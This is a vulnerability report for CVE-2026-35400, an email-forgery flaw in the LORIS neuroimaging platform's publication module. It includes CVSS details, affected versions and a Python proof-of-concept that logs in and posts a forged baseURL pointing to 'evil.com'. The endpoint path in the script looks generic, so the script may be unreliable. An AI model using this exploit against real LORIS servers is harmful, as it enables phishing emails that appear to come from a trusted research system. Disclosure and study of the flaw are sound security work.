Security Vulnerability Report
CVE-2026-35400 CVSS 3.5 LOW

CVE-2026-35400

Published: 2026-04-08 19:25:24
Last Modified: 2026-04-21 20:13:39

Description

LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From 20.0.0 to before 27.0.3 and 28.0.1, an endpoint in the publication module was incorrectly trusting the baseURL submitted by a user's POST request rather than the internal LORIS value. This could result in a theoretical attacker with publication module access forging an email to an external domain under the attacker's control which appeared to come from LORIS. This vulnerability is fixed in 27.0.3 and 28.0.1.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mcgill:loris:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mcgill:loris:28.0.0:*:*:*:*:*:*:* - VULNERABLE
LORIS 20.0.0 to 27.0.2
LORIS 28.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_host = "https://example-loris.com"
attacker_domain = "https://evil.com"
login_url = f"{target_host}/login"
vuln_url = f"{target_host}/publication_module/api/endpoint"

# User credentials (low-privilege user required)
username = "researcher"
password = "password"

# Establish session
session = requests.Session()

# 1. Login to get session cookie
login_data = {"username": username, "password": password}
session.post(login_url, data=login_data)

# 2. Send malicious POST request to trigger email forgery
# Exploit: malicious baseURL in POST data
payload = {
    "baseURL": attacker_domain,  # The vulnerable parameter
    "title": "Fake Research Update",
    "description": "Please check this link.",
}
response = session.post(vuln_url, data=payload)

if response.status_code == 200:
    print("[+] Exploit successful! Email sent with attacker-controlled baseURL.")
else:
    print(f"[-] Exploit failed. Status: {response.status_code}")

References

https://github.com/aces/Loris/security/advisories/GHSA-6prw-34x8-3gpg (Vendor Advisory)
